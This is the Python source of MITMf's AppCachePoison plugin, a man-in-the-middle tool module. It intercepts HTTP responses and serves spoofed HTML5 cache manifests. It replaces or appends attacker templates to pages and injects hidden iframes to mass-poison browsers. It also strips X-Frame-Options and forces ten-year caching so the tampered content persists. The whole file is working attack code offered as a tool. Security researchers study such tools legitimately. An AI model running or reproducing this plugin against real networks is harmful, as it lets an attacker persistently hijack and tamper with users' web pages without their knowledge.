byt3bl33d3r/MITMf

View on GitHub
plugins/appcachepoison.py

Summary

Maintainability
C
1 day
Test Coverage
# Copyright (c) 2014-2016 Krzysztof Kotowicz, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import re 
import os.path
import time
import sys

from datetime import date
from plugins.plugin import Plugin

class AppCachePlugin(Plugin):
    name       = "AppCachePoison"
    optname    = "appoison"
    desc       = "Performs App Cache Poisoning attacks"
    version    = "0.3"

    def initialize(self, options):
        self.options = options
        self.mass_poisoned_browsers = []

        from core.sslstrip.URLMonitor import URLMonitor
        self.urlMonitor = URLMonitor.getInstance()
        self.urlMonitor.caching = True
        self.urlMonitor.setAppCachePoisoning()

    def response(self, response, request, data):

        self.app_config = self.config['AppCachePoison']
        url = request.client.uri
        req_headers = request.client.getAllHeaders()
        headers = request.client.responseHeaders
        ip = request.client.getClientIP()

        if "enable_only_in_useragents" in self.app_config:
            regexp = self.app_config["enable_only_in_useragents"]
            if regexp and not re.search(regexp,req_headers["user-agent"]):
                self.clientlog.info("Tampering disabled in this useragent ({})".format(req_headers["user-agent"]), extra=request.clientInfo)
                return {'response': response, 'request': request, 'data': data}

        urls = self.urlMonitor.getRedirectionSet(url)
        self.clientlog.debug("Got redirection set: {}".format(urls), extra=request.clientInfo)

        section = False
        for url in urls:
            for name in self.app_config:
                if isinstance(self.app_config[name], dict): #'tis a section
                    section = self.app_config[name]

                    if section.get('manifest_url', False) == url:
                        self.clientlog.info("Found URL in section '{}'!".format(name), extra=request.clientInfo)
                        self.clientlog.info("Poisoning manifest URL", extra=request.clientInfo)
                        data = self.getSpoofedManifest(url, section)
                        headers.setRawHeaders("Content-Type", ["text/cache-manifest"])

                    elif section.get('raw_url',False) == url: # raw resource to modify, it does not have to be html
                        self.clientlog.info("Found URL in section '{}'!".format(name), extra=request.clientInfo)
                        p = self.getTemplatePrefix(section)
                        self.clientlog.info("Poisoning raw URL", extra=request.clientInfo)
                        if os.path.exists(p + '.replace'): # replace whole content
                            with open(p + '.replace', 'r') as f:
                                data = f.read()

                        elif os.path.exists(p + '.append'): # append file to body
                            with open(p + '.append', 'r') as f:
                                data += f.read()

                    elif (section.get('tamper_url',False) == url) or (section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url)):
                        self.clientlog.info("Found URL in section '{}'!".format(name), extra=request.clientInfo)
                        p = self.getTemplatePrefix(section)
                        self.clientlog.info("Poisoning URL with tamper template: {}".format(p), extra=request.clientInfo)
                        if os.path.exists(p + '.replace'): # replace whole content
                            with open(p + '.replace', 'r') as f:
                                data = f.read()

                        elif os.path.exists(p + '.append'): # append file to body
                            with open(p + '.append', 'r') as f:
                                appendix = f.read()
                                data = re.sub(re.compile("</body>", re.IGNORECASE), appendix + "</body>", data) #append to body

                        # add manifest reference
                        data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(section)+"\"", data)

        if section is False:
            data = self.tryMassPoison(url, data, headers, req_headers, ip)

        self.cacheForFuture(headers)
        headers.removeHeader("X-Frame-Options")
        return {'response': response, 'request': request, 'data': data}

    def tryMassPoison(self, url, data, headers, req_headers, ip):
        browser_id = ip + req_headers.get("user-agent", "")

        if not 'mass_poison_url_match' in self.app_config: # no url
            return data

        if browser_id in self.mass_poisoned_browsers: #already poisoned
            return data
        
        if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]): #not HTML
            return data
        
        if 'mass_poison_useragent_match' in self.app_config and not "user-agent" in req_headers:
            return data
        
        if not re.search(self.app_config['mass_poison_useragent_match'], req_headers['user-agent']): #different UA
            return data
        
        if not re.search(self.app_config['mass_poison_url_match'], url): #different url
            return data
        
        self.clientlog.debug("Adding AppCache mass poison for URL {}, id {}".format(url, browser_id), extra=request.clientInfo)
        appendix = self.getMassPoisonHtml()
        data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
        self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip
        return data

    def getMassPoisonHtml(self):
        html = "<div style=\"position:absolute;left:-100px\">"
        for i in self.app_config:
            if isinstance(self.app_config[i], dict):
                if self.app_config[i].has_key('tamper_url') and not self.app_config[i].get('skip_in_mass_poison', False):
                    html += "<iframe sandbox=\"\" style=\"opacity:0;visibility:hidden\" width=\"1\" height=\"1\" src=\"" + self.app_config[i]['tamper_url'] + "\"></iframe>" 

        return html + "</div>"

    def cacheForFuture(self, headers):
        ten_years = 315569260
        headers.setRawHeaders("Cache-Control",["max-age={}".format(ten_years)])
        headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh
        in_ten_years = date.fromtimestamp(time.time() + ten_years)
        headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])

    def getSpoofedManifest(self, url, section):
        p = self.getTemplatePrefix(section)
        if not os.path.exists(p+'.manifest'):
          p = self.getDefaultTemplatePrefix()

        with open(p + '.manifest', 'r') as f:
            manifest = f.read()
        return self.decorate(manifest, section)

    def decorate(self, content, section):
        for entry in section:
          content = content.replace("%%{}%%".format(entry), section[entry])
        return content

    def getTemplatePrefix(self, section):
        if section.has_key('templates'):
            return self.app_config['templates_path'] + '/' + section['templates']
        
        return self.getDefaultTemplatePrefix()

    def getDefaultTemplatePrefix(self):
        return self.app_config['templates_path'] + '/default'

    def getManifestUrl(self, section):
        return section.get("manifest_url",'/robots.txt')